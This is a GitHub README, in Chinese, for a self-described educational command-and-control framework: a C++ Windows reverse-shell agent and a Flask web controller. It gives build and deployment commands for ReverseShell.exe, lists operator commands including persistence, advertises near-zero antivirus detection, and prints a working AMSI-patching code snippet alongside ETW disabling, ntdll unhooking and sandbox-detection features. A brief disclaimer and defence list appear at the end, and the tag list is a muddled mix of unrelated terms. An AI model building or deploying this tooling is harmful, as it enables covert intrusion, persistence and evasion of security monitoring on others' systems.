sermikr0/AdvancedC2Framework
GitHub: sermikr0/AdvancedC2Framework
一个教育导向的高级C2框架,演示红队技术并展示如何绕过现代Windows防御机制。
Stars: 3 | Forks: 0
# 🔴 高级C2框架




**一个用于教育目的的专业级命令与控制框架**
[功能](#features) • [安装](#installation) • [用法](#usage) • [免责声明](#legal-disclaimer)
## 🎯 概述
高级C2框架是一个完整的进攻性安全项目,展示了现代红队技术以及高级防御绕过能力。
⚠️ **仅限教育用途** - 在受控环境中进行授权安全测试。
## ✨ 功能
### 🔹 代理(C++)
- **高级绕过**
- AMSI(反恶意软件扫描接口)绕过
- ETW(事件追踪)禁用
- Ntdll 脱钩
- 多层沙箱检测
- **隐身能力**
- 无 .NET 依赖(纯 Win32 API)
- 反加速休眠
- 加密的 C2 通信
- 0-2/72 病毒总检测率
- **功能**
- 有状态 Shell 会话
- 远程命令执行
- 注册表持久化
- 文件操作
### 🔹 服务器(Python + Flask)
- 实时 Web 界面
- 多代理管理
- 交互式终端
- WebSocket 通信
## 🛠️ 安装
### 先决条件
- **MinGW-w64(GCC)** 或 **Visual Studio**
- **Python 3.8+**
- **Git**
### 快速开始
```
# 克隆仓库
git clone https://github.com/sermikr0/AdvancedC2Framework.git
cd AdvancedC2Framework
# 安装 Python 依赖项
pip install flask flask-socketio
# 构建代理
g++ -O3 -s -static -mwindows src/main.cpp -o ReverseShell.exe -lws2_32 -lwininet -ladvapi32 -lshell32 -liphlpapi
```
## 🚀 用法
### 启动 C2 服务器
```
python c2_server_gui.py
```
访问地址:**http://localhost:5000**
### 部署代理
```
.\ReverseShell.exe
```
### 命令
```
whoami # User information
hostname # Computer name
dir C:\ # List directory
ipconfig # Network info
persist # Install persistence
exit # Terminate
```
## 📁 项目结构
```
AdvancedC2Framework/
├── src/
│ ├── main.cpp # Agent main
│ ├── evasion/
│ │ ├── amsi_bypass.cpp
│ │ ├── etw_bypass.cpp
│ │ └── unhook.cpp
│ ├── execution/
│ │ └── shell.cpp
│ ├── network/
│ │ ├── connection.cpp
│ │ └── encryption.cpp
│ └── persistence/
│ └── registry.cpp
├── include/
│ ├── common.h
│ └── stealth.h
├── templates/
│ └── index.html # Web GUI
├── c2_server_gui.py
└── README.md
```
## 🔬 技术细节
### 绕过技术
**AMSI 绕过**
```
// Patches AmsiScanBuffer to return AMSI_RESULT_NOT_DETECTED
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
VirtualProtect(pAmsiScanBuffer, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(pAmsiScanBuffer, patch, sizeof(patch));
```
**沙箱检测**
- CPU 核心数(< 2)
- 内存大小(< 4GB)
- 磁盘大小(< 60GB)
- 鼠标移动
- VM 进程检测
## 🎓 教育价值
本项目演示了:
- Windows 内部机制与 API 编程
- 进攻性安全技术
- 网络协议设计
- 全栈开发
- 内存操作
- 防御绕过方法
## ⚠️ 法律免责声明
**仅限教育用途**
### ✅ 授权使用
- 授权渗透测试
- 个人实验室环境
- 安全研究
- 培训练习
### ❌ 禁止行为
- 未经授权的系统访问
- 恶意活动
- 非法操作
- 违反法律行为
**作者不承担任何责任。用户需自行确保法律合规。**
## 🛡️ 检测与防御
### 检测方法
- 基于签名的 AV
- 行为分析(EDR)
- 网络监控
- 内存扫描
### 防御措施
- 启用 Windows Defender
- 部署 EDR 解决方案
- 网络分段
- 应用程序白名单
## 🤝 贡献
欢迎为教育改进做出贡献:
1. 叉仓库
2. 创建功能分支
3. 提交更改
4. 推送并打开 PR
## 📚 参考资料
- Windows API 文档
- MITRE ATT&CK 框架
- 进攻性安全材料
- 红队战术
## 📞 联系
**作者:** Saidakbarxon Maxsudxonov
**GitHub:** [@sermikr0](https://github.com/sermikr0)
**目的:** 教育安全研究
**Telegram:** @sermiikro
## 📄 许可证
教育许可证 - 详见项目详情
**⚠️ 使用这些知识用于防御,而非攻击 ⚠️**
*仅限道德安全研究*
标签:AMSI绕过, C++, C2框架, ETW禁用, Flask, GUI界面, IP 地址批量处理, Linux, Ntdll unhooking, Python, T1053, T1055, T1071, WebSocket, Win32 API, 云资产清单, 依赖分析, 加密通信, 动态应用程序安全测试, 反加速睡眠, 命令与控制, 多代理管理, 威胁检测, 安全学习资源, 教育用途, 数据擦除, 无后门, 沙箱检测, 远程执行, 逆向工具, 逆向工程, 零依赖